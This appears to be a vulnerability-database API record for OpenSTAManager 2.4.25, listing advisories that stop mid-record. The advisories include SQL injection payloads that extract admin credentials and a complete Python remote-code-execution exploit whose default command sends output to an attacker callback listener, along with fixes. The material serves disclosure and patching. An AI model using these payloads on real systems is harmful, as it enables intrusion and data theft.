{ "url": "http://public2.vulnerablecode.io/api/packages/898427?format=api", "purl": "pkg:composer/devcode-it/openstamanager@2.4.25", "type": "composer", "namespace": "devcode-it", "name": "openstamanager", "version": "2.4.25", "qualifiers": {}, "subpath": "", "is_vulnerable": true, "next_non_vulnerable_version": "2.10.2", "latest_non_vulnerable_version": "2.10.2", "affected_by_vulnerabilities": [ { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/49991?format=api", "vulnerability_id": "VCID-2br1-99zg-z7bh", "summary": "OpenSTAManager has a SQL Injection in ajax_complete.php (get_sedi endpoint)\nA SQL Injection vulnerability exists in the `ajax_complete.php` endpoint when handling the `get_sedi` operation. An authenticated attacker can inject malicious SQL code through the `idanagrafica` parameter, leading to unauthorized database access.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-69213", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00045", "scoring_system": "epss", "scoring_elements": "0.14353", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00058", "scoring_system": "epss", "scoring_elements": "0.18503", "published_at": "2026-06-08T12:55:00Z" }, { "value": "0.00058", "scoring_system": "epss", "scoring_elements": "0.18585", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00058", "scoring_system": "epss", "scoring_elements": "0.18623", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-69213" }, { "reference_url": "https://github.com/devcode-it/openstamanager", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/devcode-it/openstamanager" }, { "reference_url": 
"https://nvd.nist.gov/vuln/detail/CVE-2025-69213", "reference_id": "CVE-2025-69213", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69213" }, { "reference_url": "https://github.com/advisories/GHSA-w995-ff8h-rppg", "reference_id": "GHSA-w995-ff8h-rppg", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-w995-ff8h-rppg" }, { "reference_url": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-w995-ff8h-rppg", "reference_id": "GHSA-w995-ff8h-rppg", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-02-04T19:32:28Z/" } ], "url": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-w995-ff8h-rppg" } ], "fixed_packages": [], "aliases": [ "CVE-2025-69213", "GHSA-w995-ff8h-rppg" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-2br1-99zg-z7bh" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89765?format=api", "vulnerability_id": "VCID-5srf-wjj5-z3fj", "summary": "OpenSTAManager has a SQL Injection via righe Parameter in confronta_righe Modals\n## Description\n\nSix `confronta_righe.php` files across different modules in OpenSTAManager <= 2.10.1 contain an SQL Injection vulnerability. 
The `righe` parameter received via `$_GET['righe']` is directly concatenated into an SQL query without any sanitization, parameterization or validation.\n\nAn authenticated attacker can inject arbitrary SQL statements to extract sensitive data from the database, including user credentials, customer information, invoice data and any other stored data.\n\n## Affected Files\n\nAll 6 vulnerable files share the same code pattern:\n\n| # | File | Line | Affected Table |\n|---|------|------|----------------|\n| 1 | `modules/fatture/modals/confronta_righe.php` | 29 | `co_righe_documenti` |\n| 2 | `modules/interventi/modals/confronta_righe.php` | 29 | `in_righe_interventi` |\n| 3 | `modules/preventivi/modals/confronta_righe.php` | 28 | `co_righe_preventivi` |\n| 4 | `modules/ordini/modals/confronta_righe.php` | 29 | `or_righe_ordini` |\n| 5 | `modules/ddt/modals/confronta_righe.php` | 29 | `dt_righe_ddt` |\n| 6 | `modules/contratti/modals/confronta_righe.php` | 28 | `co_righe_contratti` |\n\n## Vulnerable Code\n\nAll files follow the same pattern. Example from `modules/interventi/modals/confronta_righe.php`:\n\n```php\n$righe = $_GET['righe']; // Line 29 — No sanitization\n\n$righe = $dbo->fetchArray(\n 'SELECT\n `mg_articoli_lang`.`title`,\n `mg_articoli`.`codice`,\n `in_righe_interventi`.*\n FROM\n `in_righe_interventi`\n INNER JOIN `mg_articoli` ON `mg_articoli`.`id` = `in_righe_interventi`.`idarticolo`\n LEFT JOIN `mg_articoli_lang` ON (...)\n WHERE\n `in_righe_interventi`.`id` IN ('.$righe.')' // Line 41 — Direct concatenation\n);\n```\n\nThe value of `$_GET['righe']` is inserted directly into the SQL `IN()` clause without using `prepare()`, parameterized statements or any sanitization function.\n\n## Reproduction\n\n### Prerequisites\n\n- Authenticated session (any user with module access)\n- At least one existing record in the target module (e.g. 
an intervention with id=1)\n\n### Step 1: Extract MySQL version\n\n```\nGET /modules/interventi/modals/confronta_righe.php?id_module=3&id_record=1&righe=1) AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT VERSION())))%23\n```\n\n**Result:** `XPATH syntax error: '~8.3.0'`\n\n### Step 2: Extract database user\n\n```\nGET /modules/interventi/modals/confronta_righe.php?id_module=3&id_record=1&righe=1) AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT USER())))%23\n```\n\n**Result:** `XPATH syntax error: '~root@172.19.0.3'`\n\n### Step 3: Extract admin credentials\n\n```\nGET /modules/interventi/modals/confronta_righe.php?id_module=3&id_record=1&righe=1) AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT CONCAT(username,0x3a,password) FROM zz_users LIMIT 1)))%23\n```\n\n**Result:** `XPATH syntax error: '~admin:$2y$10$qAo04wNbhR9cpxjHzr'`\n\n### Evidence\n\n<img width=\"1254\" height=\"395\" alt=\"image\" src=\"https://github.com/user-attachments/assets/a2367ed6-fa03-4668-9d74-4298cac5e429\" />\n\n\n### HTTP Request\n\n```http\nGET /modules/interventi/modals/confronta_righe.php?id_module=3&id_record=1&righe=1)%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,(SELECT%20CONCAT(username,0x3a,password)%20FROM%20zz_users%20LIMIT%201)))%23 HTTP/1.1\nHost: <TARGET>\nCookie: PHPSESSID=<SESSION_ID>\n```\n\n### Response (excerpt)\n\n```\nSQLSTATE[HY000]: General error: 1105 XPATH syntax error: '~admin:$2y$10$qAo04wNbhR9cpxjHzr'\n```\n\n## Impact\n\n- **Confidentiality (High):** Full database data extraction including user credentials (bcrypt hashes), customer data, invoices, contracts and any stored information\n- **Integrity (High):** Data modification via injected INSERT/UPDATE/DELETE statements through stacked queries or subqueries\n- **Availability (High):** Deletion of tables or critical data, database corruption\n\n## Remediation\n\n### Recommended Fix\n\nUse parameterized statements with `prepare()` for the `righe` parameter:\n\n```php\n// BEFORE (vulnerable):\n$righe = $_GET['righe'];\n$righe = $dbo->fetchArray(\n '... 
WHERE `in_righe_interventi`.`id` IN ('.$righe.')'\n);\n\n// AFTER (secure):\n$righe_ids = array_map('intval', explode(',', $_GET['righe'] ?? ''));\n$placeholders = implode(',', array_fill(0, count($righe_ids), '?'));\n$righe = $dbo->fetchArray(\n '... WHERE `in_righe_interventi`.`id` IN ('.$placeholders.')',\n $righe_ids\n);\n```\n\nThis fix must be applied to all **6 files** listed in the \"Affected Files\" section.\n\n## Credits\nOmar Ramirez", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35470", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00014", "scoring_system": "epss", "scoring_elements": "0.02903", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00014", "scoring_system": "epss", "scoring_elements": "0.02841", "published_at": "2026-06-08T12:55:00Z" }, { "value": "0.00014", "scoring_system": "epss", "scoring_elements": "0.02857", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00014", "scoring_system": "epss", "scoring_elements": "0.0291", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35470" }, { "reference_url": "https://github.com/devcode-it/openstamanager", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/devcode-it/openstamanager" }, { "reference_url": "https://github.com/devcode-it/openstamanager/releases/tag/v2.10.2", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-07T14:06:23Z/" } 
], "url": "https://github.com/devcode-it/openstamanager/releases/tag/v2.10.2" }, { "reference_url": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-mmm5-3g4x-qw39", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-07T14:06:23Z/" } ], "url": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-mmm5-3g4x-qw39" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35470", "reference_id": "CVE-2026-35470", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35470" }, { "reference_url": "https://github.com/advisories/GHSA-mmm5-3g4x-qw39", "reference_id": "GHSA-mmm5-3g4x-qw39", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-mmm5-3g4x-qw39" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/110583?format=api", "purl": "pkg:composer/devcode-it/openstamanager@2.10.2", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/devcode-it/openstamanager@2.10.2" } ], "aliases": [ "CVE-2026-35470", "GHSA-mmm5-3g4x-qw39" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-5srf-wjj5-z3fj" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89672?format=api", "vulnerability_id": "VCID-5tn6-au4e-33de", "summary": "OpenSTAManager Affected by Remote Code Execution via Insecure Deserialization in 
OAuth2\n## Description\n\nThe `oauth2.php` file in OpenSTAManager is an **unauthenticated** endpoint (`$skip_permissions = true`). It loads a record from the `zz_oauth2` table using the attacker-controlled GET parameter `state`, and during the OAuth2 configuration flow calls `unserialize()` on the `access_token` field **without any class restriction**.\n\nAn attacker who can write to the `zz_oauth2` table (e.g., via the arbitrary SQL injection in the Aggiornamenti module reported in [GHSA-2fr7-cc4f-wh98](https://github.com/devcode-it/openstamanager/security/advisories/GHSA-2fr7-cc4f-wh98)) can insert a malicious serialized PHP object (gadget chain) that upon deserialization executes arbitrary commands on the server as the `www-data` user.\n\n## Affected code\n\n### Entry point — `oauth2.php`\n\n```php\n$skip_permissions = true; // Line 23: NO AUTHENTICATION\ninclude_once __DIR__.'/core.php';\n\n$state = $_GET['state']; // Line 28: attacker-controlled\n$code = $_GET['code'];\n\n$account = OAuth2::where('state', '=', $state)->first(); // Line 33: fetches injected record\n$response = $account->configure($code, $state); // Line 51: triggers the chain\n```\n\n### Deserialization — `src/Models/OAuth2.php`\n\n```php\n// Line 193 (checkTokens):\n$access_token = $this->access_token ? unserialize($this->access_token) : null;\n\n// Line 151 (getAccessToken):\nreturn $this->attributes['access_token'] ? 
unserialize($this->attributes['access_token']) : null;\n```\n\n`unserialize()` is called without the `allowed_classes` parameter, allowing instantiation of any class loaded by the Composer autoloader.\n\n## Execution flow\n\n```\noauth2.php (no auth)\n → configure()\n → needsConfiguration()\n → getAccessToken()\n → checkTokens()\n → unserialize($this->access_token) ← attacker payload\n → Creates PendingBroadcast object (Laravel/RCE22 gadget chain)\n → $access_token->hasExpired() ← PendingBroadcast lacks this method → PHP Error\n → During error cleanup:\n → PendingBroadcast.__destruct() ← fires during shutdown\n → system($command) ← RCE\n```\n\nThe HTTP response is 500 (due to the `hasExpired()` error), but the command has already executed via `__destruct()` during error cleanup.\n\n## Full attack chain\n\nThis vulnerability is combined with the arbitrary SQL injection in the Aggiornamenti module ([GHSA-2fr7-cc4f-wh98](https://github.com/devcode-it/openstamanager/security/advisories/GHSA-2fr7-cc4f-wh98)) to achieve unauthenticated RCE:\n\n1. **Payload injection** (requires admin account): Via `op=risolvi-conflitti-database`, arbitrary SQL is executed to insert a malicious serialized object into `zz_oauth2.access_token`\n2. **RCE trigger** (unauthenticated): A GET request to `oauth2.php?state=<known_value>&code=x` triggers the deserialization and executes the command\n\n**Persistence note**: The `risolvi-conflitti-database` handler ends with `exit;` (line 128), which prevents the outer transaction commit. DML statements (INSERT) would be rolled back. 
To persist the INSERT, DDL statements (`CREATE TABLE`/`DROP TABLE`) are included to force an implicit MySQL commit.\n\n## Gadget chain\n\nThe chain used is **Laravel/RCE22** (available in [phpggc](https://github.com/ambionics/phpggc)) which exploits classes from the Laravel framework present in the project's dependencies:\n\n```\nPendingBroadcast.__destruct()\n → $this->events->dispatch($this->event)\n → chain of __call() / __invoke()\n → system($command)\n```\n\n## Proof of Concept\n\n### Execution\n\n**Terminal 1** — Attacker listener:\n```bash\npython3 listener.py --port 9999\n```\n\n**Terminal 2** — Exploit:\n```bash\npython3 exploit.py \\\n --target http://localhost:8888 \\\n --callback http://host.docker.internal:9999 \\\n --user admin --password <password>\n```\n<img width=\"638\" height=\"722\" alt=\"image\" src=\"https://github.com/user-attachments/assets/e949b641-7986-44b9-acbf-1c5dd0f7ef1f\" />\n\n### Observed result\n\n**Listener receives:**\n<img width=\"683\" height=\"286\" alt=\"image\" src=\"https://github.com/user-attachments/assets/89a78f7e-5f23-435d-97ec-d74ac905cdc1\" />\nThe `id` command was executed on the server as `www-data`, confirming RCE.\n\n### HTTP requests from the exploit\n\n**Step 4 — Injection (authenticated):**\n```\nPOST /actions.php HTTP/1.1\nCookie: PHPSESSID=<session>\nContent-Type: application/x-www-form-urlencoded\n\nop=risolvi-conflitti-database&id_module=6&queries=[\"DELETE FROM zz_oauth2 WHERE state='poc-xxx'\",\"INSERT INTO zz_oauth2 (id,name,class,client_id,client_secret,config,state,access_token,after_configuration,is_login,enabled) VALUES (99999,'poc','Modules\\\\\\\\Emails\\\\\\\\OAuth2\\\\\\\\Google','x','x','{}','poc-xxx',0x<payload_hex>,'',0,1)\",\"CREATE TABLE IF NOT EXISTS _t(i INT)\",\"DROP TABLE IF EXISTS _t\"]\n```\n\n**Step 5 — Trigger (NO authentication):**\n```\nGET /oauth2.php?state=poc-xxx&code=x HTTP/1.1\n\n(No cookies — completely anonymous request)\n```\n\n**Response:** HTTP 500 (expected — the error 
occurs after `__destruct()` has already executed the command)\n\n### Exploit — `exploit.py`\n\n```python\n#!/usr/bin/env python3\n\"\"\"\nOpenSTAManager v2.10.1 — RCE PoC (Arbitrary SQL → Insecure Deserialization)\n\nUsage:\n python3 listener.py --port 9999\n python3 exploit.py --target http://localhost:8888 --callback http://host.docker.internal:9999 --user admin --password Test1234\n\"\"\"\n\nimport argparse\nimport json\nimport random\nimport re\nimport string\nimport subprocess\nimport sys\nimport time\n\ntry:\n import requests\nexcept ImportError:\n print(\"[!] pip install requests\")\n sys.exit(1)\n\nRED = \"\\033[91m\"\nGREEN = \"\\033[92m\"\nYELLOW = \"\\033[93m\"\nBLUE = \"\\033[94m\"\nBOLD = \"\\033[1m\"\nDIM = \"\\033[2m\"\nRESET = \"\\033[0m\"\n\nBANNER = f\"\"\"\n {RED}{'=' * 58}{RESET}\n {RED}{BOLD} OpenSTAManager v2.10.1 — RCE Proof of Concept{RESET}\n {RED}{BOLD} Arbitrary SQL → Insecure Deserialization{RESET}\n {RED}{'=' * 58}{RESET}\n\"\"\"\n\n\ndef log(msg, status=\"*\"):\n icons = {\"*\": f\"{BLUE}*{RESET}\", \"+\": f\"{GREEN}+{RESET}\", \"-\": f\"{RED}-{RESET}\", \"!\": f\"{YELLOW}!{RESET}\"}\n print(f\" [{icons.get(status, '*')}] {msg}\")\n\n\ndef step_header(num, title):\n print(f\"\\n {BOLD}── Step {num}: {title} ──{RESET}\\n\")\n\n\ndef generate_payload(container, command):\n step_header(1, \"Generate Gadget Chain Payload\")\n\n log(\"Checking phpggc in container...\")\n result = subprocess.run([\"docker\", \"exec\", container, \"test\", \"-f\", \"/tmp/phpggc/phpggc\"], capture_output=True)\n if result.returncode != 0:\n log(\"Installing phpggc...\", \"!\")\n proc = subprocess.run(\n [\"docker\", \"exec\", container, \"git\", \"clone\", \"https://github.com/ambionics/phpggc\", \"/tmp/phpggc\"],\n capture_output=True, text=True,\n )\n if proc.returncode != 0:\n log(f\"Failed to install phpggc: {proc.stderr}\", \"-\")\n sys.exit(1)\n\n log(f\"Command: {DIM}{command}{RESET}\")\n\n result = subprocess.run(\n [\"docker\", \"exec\", container, 
\"php\", \"/tmp/phpggc/phpggc\", \"Laravel/RCE22\", \"system\", command],\n capture_output=True,\n )\n if result.returncode != 0:\n log(f\"phpggc failed: {result.stderr.decode()}\", \"-\")\n sys.exit(1)\n\n payload_bytes = result.stdout\n log(f\"Payload: {BOLD}{len(payload_bytes)} bytes{RESET}\", \"+\")\n return payload_bytes\n\n\ndef authenticate(target, username, password):\n step_header(2, \"Authenticate\")\n session = requests.Session()\n log(f\"Logging in as '{username}'...\")\n\n resp = session.post(\n f\"{target}/index.php\",\n data={\"op\": \"login\", \"username\": username, \"password\": password},\n allow_redirects=False, timeout=10,\n )\n\n location = resp.headers.get(\"Location\", \"\")\n if resp.status_code != 302 or \"index.php\" in location:\n log(\"Login failed! Wrong credentials or brute-force lockout (3 attempts / 180s).\", \"-\")\n sys.exit(1)\n\n session.get(f\"{target}{location}\", timeout=10)\n log(\"Authenticated\", \"+\")\n return session\n\n\ndef find_module_id(session, target, container):\n step_header(3, \"Find 'Aggiornamenti' Module ID\")\n log(\"Searching navigation sidebar...\")\n resp = session.get(f\"{target}/controller.php\", timeout=10)\n\n for match in re.finditer(r'id_module=(\\d+)', resp.text):\n snippet = resp.text[match.start():match.start() + 300]\n if re.search(r'[Aa]ggiornamenti', snippet):\n module_id = int(match.group(1))\n log(f\"Module ID: {BOLD}{module_id}{RESET}\", \"+\")\n return module_id\n\n log(\"Not found in sidebar, querying database...\", \"!\")\n result = subprocess.run(\n [\"docker\", \"exec\", container, \"php\", \"-r\",\n \"require '/var/www/html/config.inc.php'; \"\n \"$pdo = new PDO('mysql:host='.$db_host.';dbname='.$db_name, $db_username, $db_password); \"\n \"echo $pdo->query(\\\"SELECT id FROM zz_modules WHERE name='Aggiornamenti'\\\")->fetchColumn();\"],\n capture_output=True, text=True,\n )\n if result.stdout.strip().isdigit():\n module_id = int(result.stdout.strip())\n log(f\"Module ID: 
{BOLD}{module_id}{RESET}\", \"+\")\n return module_id\n\n log(\"Could not find module ID\", \"-\")\n sys.exit(1)\n\n\ndef inject_payload(session, target, module_id, payload_bytes, state_value):\n step_header(4, \"Inject Payload via Arbitrary SQL\")\n\n hex_payload = payload_bytes.hex()\n record_id = random.randint(90000, 99999)\n\n queries = [\n f\"DELETE FROM zz_oauth2 WHERE id={record_id} OR state='{state_value}'\",\n f\"INSERT INTO zz_oauth2 \"\n f\"(id, name, class, client_id, client_secret, config, \"\n f\"state, access_token, after_configuration, is_login, enabled) VALUES \"\n f\"({record_id}, 'poc', 'Modules\\\\\\\\Emails\\\\\\\\OAuth2\\\\\\\\Google', \"\n f\"'x', 'x', '{{}}', '{state_value}', 0x{hex_payload}, '', 0, 1)\",\n \"CREATE TABLE IF NOT EXISTS _poc_ddl_commit (i INT)\",\n \"DROP TABLE IF EXISTS _poc_ddl_commit\",\n ]\n\n log(f\"State trigger: {BOLD}{state_value}{RESET}\")\n log(f\"Payload: {len(hex_payload)//2} bytes ({len(hex_payload)} hex)\")\n log(\"Sending to actions.php...\")\n\n resp = session.post(\n f\"{target}/actions.php\",\n data={\"op\": \"risolvi-conflitti-database\", \"id_module\": str(module_id), \"id_record\": \"\", \"queries\": json.dumps(queries)},\n timeout=15,\n )\n\n try:\n result = json.loads(resp.text)\n if result.get(\"success\"):\n log(\"Payload planted in zz_oauth2.access_token\", \"+\")\n return True\n else:\n log(f\"Injection failed: {result.get('message', '?')}\", \"-\")\n return False\n except json.JSONDecodeError:\n log(f\"Unexpected response (HTTP {resp.status_code}): {resp.text[:200]}\", \"-\")\n return False\n\n\ndef trigger_rce(target, state_value):\n step_header(5, \"Trigger RCE (NO AUTHENTICATION)\")\n\n url = f\"{target}/oauth2.php\"\n log(f\"GET {url}?state={state_value}&code=x\")\n log(f\"{DIM}(This request is UNAUTHENTICATED){RESET}\")\n\n try:\n resp = requests.get(url, params={\"state\": state_value, \"code\": \"x\"}, allow_redirects=False, timeout=15)\n log(f\"HTTP {resp.status_code}\", \"+\")\n if 
resp.status_code == 500:\n log(f\"{DIM}500 expected: __destruct() fires the gadget chain before error handling{RESET}\")\n except requests.exceptions.Timeout:\n log(\"Timed out (command may still have executed)\", \"!\")\n except requests.exceptions.ConnectionError as e:\n log(f\"Connection error: {e}\", \"-\")\n\n\ndef main():\n parser = argparse.ArgumentParser(description=\"OpenSTAManager v2.10.1 — RCE PoC\")\n parser.add_argument(\"--target\", required=True, help=\"Target URL\")\n parser.add_argument(\"--callback\", required=True, help=\"Attacker listener URL reachable from the container\")\n parser.add_argument(\"--user\", default=\"admin\", help=\"Username (default: admin)\")\n parser.add_argument(\"--password\", required=True, help=\"Password\")\n parser.add_argument(\"--container\", default=\"osm-web\", help=\"Docker web container (default: osm-web)\")\n parser.add_argument(\"--command\", help=\"Custom command (default: curl callback with id output)\")\n args = parser.parse_args()\n\n print(BANNER)\n\n target = args.target.rstrip(\"/\")\n callback = args.callback.rstrip(\"/\")\n state_value = \"poc-\" + \"\".join(random.choices(string.ascii_lowercase + string.digits, k=12))\n command = args.command or f\"curl -s {callback}/rce-$(id|base64 -w0)\"\n\n payload = generate_payload(args.container, command)\n session = authenticate(target, args.user, args.password)\n module_id = find_module_id(session, target, args.container)\n\n if not inject_payload(session, target, module_id, payload, state_value):\n log(\"Exploit failed at injection step\", \"-\")\n sys.exit(1)\n\n time.sleep(1)\n trigger_rce(target, state_value)\n\n print(f\"\\n {BOLD}── Result ──{RESET}\\n\")\n log(\"Exploit complete. 
Check your listener for the callback.\", \"+\")\n log(\"Expected: GET /rce-<base64(id)>\")\n log(f\"If no callback, verify the container can reach: {callback}\", \"!\")\n\n\nif __name__ == \"__main__\":\n main()\n```\n\n### Listener — `listener.py`\n\n```python\n#!/usr/bin/env python3\n\"\"\"OpenSTAManager v2.10.1 — RCE Callback Listener\"\"\"\n\nimport argparse\nimport base64\nimport sys\nfrom datetime import datetime\nfrom http.server import HTTPServer, BaseHTTPRequestHandler\n\nRED = \"\\033[91m\"\nGREEN = \"\\033[92m\"\nYELLOW = \"\\033[93m\"\nBLUE = \"\\033[94m\"\nBOLD = \"\\033[1m\"\nRESET = \"\\033[0m\"\n\n\nclass CallbackHandler(BaseHTTPRequestHandler):\n def do_GET(self):\n ts = datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n print(f\"\\n {RED}{'=' * 58}{RESET}\")\n print(f\" {RED}{BOLD} RCE CALLBACK RECEIVED{RESET}\")\n print(f\" {RED}{'=' * 58}{RESET}\")\n print(f\" {GREEN}[+]{RESET} Time : {ts}\")\n print(f\" {GREEN}[+]{RESET} From : {self.client_address[0]}:{self.client_address[1]}\")\n print(f\" {GREEN}[+]{RESET} Path : {self.path}\")\n\n for part in self.path.lstrip(\"/\").split(\"/\"):\n if part.startswith(\"rce-\"):\n try:\n decoded = base64.b64decode(part[4:]).decode(\"utf-8\", errors=\"replace\")\n print(f\" {GREEN}[+]{RESET} Output : {BOLD}{decoded}{RESET}\")\n except Exception:\n print(f\" {YELLOW}[!]{RESET} Raw : {part[4:]}\")\n\n print(f\" {RED}{'=' * 58}{RESET}\\n\")\n self.send_response(200)\n self.send_header(\"Content-Type\", \"text/plain\")\n self.end_headers()\n self.wfile.write(b\"OK\")\n\n def do_POST(self):\n self.do_GET()\n\n def log_message(self, format, *args):\n pass\n\n\ndef main():\n parser = argparse.ArgumentParser(description=\"RCE callback listener\")\n parser.add_argument(\"--port\", type=int, default=9999, help=\"Listen port (default: 9999)\")\n args = parser.parse_args()\n\n server = HTTPServer((\"0.0.0.0\", args.port), CallbackHandler)\n print(f\"\\n {BLUE}{'=' * 58}{RESET}\")\n print(f\" {BLUE}{BOLD} OpenSTAManager 
v2.10.1 — RCE Callback Listener{RESET}\")\n print(f\" {BLUE}{'=' * 58}{RESET}\")\n print(f\" {GREEN}[+]{RESET} Listening on 0.0.0.0:{args.port}\")\n print(f\" {YELLOW}[!]{RESET} Waiting for callback...\\n\")\n\n try:\n server.serve_forever()\n except KeyboardInterrupt:\n print(f\"\\n {YELLOW}[!]{RESET} Stopped.\")\n sys.exit(0)\n\n\nif __name__ == \"__main__\":\n main()\n```\n\n## Impact\n\n- **Confidentiality**: Read server files, database credentials, API keys\n- **Integrity**: Write files, install backdoors, modify application code\n- **Availability**: Delete files, denial of service\n- **Scope**: Command execution as `www-data` allows pivoting to other systems on the network\n\n## Proposed remediation\n\n### Option A: Restrict `unserialize()` (recommended)\n\n```php\n// src/Models/OAuth2.php — checkTokens() and getAccessToken()\n$access_token = $this->access_token\n ? unserialize($this->access_token, ['allowed_classes' => [AccessToken::class]])\n : null;\n```\n\n### Option B: Use safe serialization\n\nReplace `serialize()`/`unserialize()` with `json_encode()`/`json_decode()` for storing OAuth2 tokens.\n\n### Option C: Authenticate `oauth2.php`\n\nRemove `$skip_permissions = true` and require authentication for the OAuth2 callback endpoint, or validate the `state` parameter against a value stored in the user's session.\n\n## Credits\nOmar Ramirez", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-29782", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00076", "scoring_system": "epss", "scoring_elements": "0.22866", "published_at": "2026-06-08T12:55:00Z" }, { "value": "0.00076", "scoring_system": "epss", "scoring_elements": "0.22919", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00076", "scoring_system": "epss", "scoring_elements": "0.22964", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00076", "scoring_system": "epss", "scoring_elements": "0.22979", "published_at": 
"2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-29782" }, { "reference_url": "https://github.com/devcode-it/openstamanager", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/devcode-it/openstamanager" }, { "reference_url": "https://github.com/devcode-it/openstamanager/commit/d2e38cbdf91a831cefc0da1548e02b297ae644cc", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-03T19:52:40Z/" } ], "url": "https://github.com/devcode-it/openstamanager/commit/d2e38cbdf91a831cefc0da1548e02b297ae644cc" }, { "reference_url": "https://github.com/devcode-it/openstamanager/releases/tag/v2.10.2", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-03T19:52:40Z/" } ], "url": "https://github.com/devcode-it/openstamanager/releases/tag/v2.10.2" }, { "reference_url": 